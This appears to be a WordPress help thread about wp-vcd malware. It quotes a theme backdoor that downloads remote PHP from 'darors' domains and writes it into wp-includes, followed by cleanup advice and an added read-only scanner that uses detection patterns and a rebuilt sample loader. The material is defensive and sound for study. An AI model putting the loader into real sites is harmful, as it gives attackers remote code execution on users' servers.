hacked - Is this a hacking script in function.php?

I have code like the below in the Neve theme for WordPress. I feel suspicious about this code.

$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent));
        @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

        if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
            @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
            if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                @file_put_contents('wp-tmp.php', $tmpcontent);
            }
        }

    }
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent));
        @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

        if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
            @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
            if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                @file_put_contents('wp-tmp.php', $tmpcontent);
            }
        }

    }
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
asked Apr 3, 2019 at 16:49 by user145078
  • It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains. – ceejayoz Commented Apr 3, 2019 at 19:15
  • That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)? – butlerblog Commented Apr 4, 2019 at 16:14
  • @butlerblog Again, without the contents of that code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon. – ceejayoz Commented Apr 4, 2019 at 17:44
  • I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't. – butlerblog Commented Apr 4, 2019 at 18:54
5 Answers

I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.

So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:

  • changing all passwords (WP admins, FTP, hosting, database)
  • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.
  • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

There is lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though; it just takes a bit of work.

Looks like wp-vcd malware to me. There's lots of info out there about that; it's most common in nulled themes (i.e., a premium theme that you didn't want to pay for and instead downloaded a free copy of from a sketchy site). If you are using such a theme, I suggest deleting it and paying the actual developer for the legitimate copy of the theme that won't include malware, or choosing another theme that fits your budget without the malware.

https://www.google/search?q=%22darors%22+wp-vcd

Yes, most probably yes.

It gets some code from a remote server and saves it on yours. So yeah, it definitely can be harmful.

That's a possibility.

Although, I think it is a mechanism to push theme updates only for sites with a valid license key.

Alternatively, it is a backdoor for deleting the theme for any compromised key.

It is difficult to say anything for sure without looking at the content which is downloaded.

I can confirm that that is malware to show ads to your users.

There are 3 files in the wp-includes folder:

'wp-feed.php',
'wp-tmp.php',
'wp-vcd.php',

and also in the theme's functions.php and other files. Use PhpStorm to safe delete and search in comments to see in how many files you have that. Here is a blog about that: https://www.getastra/blog/911/how-to-fix-wp-vcd-backdoor-hack-in-wordpress-functions-php/

The cause of this can be from infected theme files. Check also your plugins against vulnerable plugins list https://wpvulndb/
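Pulling the thread together: the question's snippet carries a few stable source-level markers (the `$wp_auth_key` assignment, a `file_get_contents` of a remote `code.php`, a `file_put_contents` into `ABSPATH . 'wp-includes/wp-tmp.php'`, the `theme_temp_setup` call), the first answer recommends sorting files by date after a clean reinstall so anything newer stands out, and the last answer lists the three files dropped into `wp-includes/`. The script below is an added example, not code from the thread or from any of the answerers, that turns those three observations into a read-only scan of a WordPress tree. The fixture it builds (`build_sample_tree`, the invalid `example.invalid` domain, the all-zero key) is constructed here for demonstration; the indicator labels and the "baseline mtime" idea are my own naming.

```python
"""Added example: read-only scanner for the wp-vcd indicators discussed in the thread."""
import os
import re
import tempfile
from pathlib import Path

# Filenames the last answer says wp-vcd drops into wp-includes/.
DROPPED_FILES = {"wp-feed.php", "wp-tmp.php", "wp-vcd.php"}

# Source-level markers lifted from the snippet in the question (labels are mine).
INDICATORS = [
    ("auth-key marker", re.compile(r"\$wp_auth_key\s*=")),
    ("remote code.php fetch",
     re.compile(r"file_get_contents(?:_tcurl)?\(\s*['\"]https?://[^'\"]*/code\.php")),
    ("write into wp-includes",
     re.compile(r"file_put_contents\(\s*ABSPATH\s*\.\s*['\"]wp-includes/wp-tmp\.php")),
    ("theme_temp_setup call", re.compile(r"theme_temp_setup\(")),
]


def scan_source(text):
    """Return the labels of every indicator present in one PHP source string."""
    return [label for label, rx in INDICATORS if rx.search(text)]


def scan_tree(root, baseline_mtime=None):
    """Walk a WordPress root and return {relative_path: [reasons]}.

    baseline_mtime, when given, is the epoch time of the last clean reinstall;
    any .php file newer than it is reported. That is the first answer's
    "sort by date" check done programmatically. Nothing is modified.
    """
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        reasons = []
        if path.parent.name == "wp-includes" and path.name in DROPPED_FILES:
            reasons.append("known wp-vcd dropped file")
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        reasons += ["source indicator: " + label for label in scan_source(text)]
        if baseline_mtime is not None and path.stat().st_mtime > baseline_mtime:
            reasons.append("modified after baseline")
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


# --- constructed fixture: a tiny WordPress-shaped tree with one infected theme file ---
CLEAN_TIME = 1_500_000_000  # pretend "reinstall" timestamp for the clean files
INFECTED_FUNCTIONS_PHP = """<?php
// constructed sample shaped like the snippet in the question; the domain is deliberately invalid
$wp_auth_key='00000000000000000000000000000000';
if ($tmpcontent = @file_get_contents("http://example.invalid/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
}
"""


def build_sample_tree(dest):
    """Write the fixture under dest; clean files get an old mtime, suspicious ones keep 'now'."""
    dest = Path(dest)
    files = {
        "wp-includes/version.php": ("<?php $wp_version = '0.0';\n", CLEAN_TIME),
        "wp-includes/wp-tmp.php": ("<?php // dropped-file placeholder\n", None),
        "wp-content/themes/neve/header.php": ("<?php get_header();\n", CLEAN_TIME),
        "wp-content/themes/neve/functions.php": (INFECTED_FUNCTIONS_PHP, None),
    }
    for rel, (content, mtime) in files.items():
        p = dest / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
        if mtime is not None:
            os.utime(p, (mtime, mtime))
    return dest


def run_demo():
    """Build the fixture in a temp dir and scan it against the pretend reinstall time."""
    tmp = tempfile.mkdtemp(prefix="wp-scan-")
    build_sample_tree(tmp)
    return scan_tree(tmp, baseline_mtime=CLEAN_TIME + 1)


if __name__ == "__main__":
    for rel, reasons in run_demo().items():
        print(rel)
        for reason in reasons:
            print("   -", reason)
```

On a real site you would call `scan_tree("/var/www/html", baseline_mtime=...)` with the mtime of a file you know was written by the clean reinstall (for example `wp-includes/version.php`); the fixture only exists so the script runs offline. The scanner is deliberately read-only: the thread's remediation advice (reinstall core, themes and plugins from trusted sources, rotate credentials, delete the nulled theme) is the fix, and this only tells you where to look.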
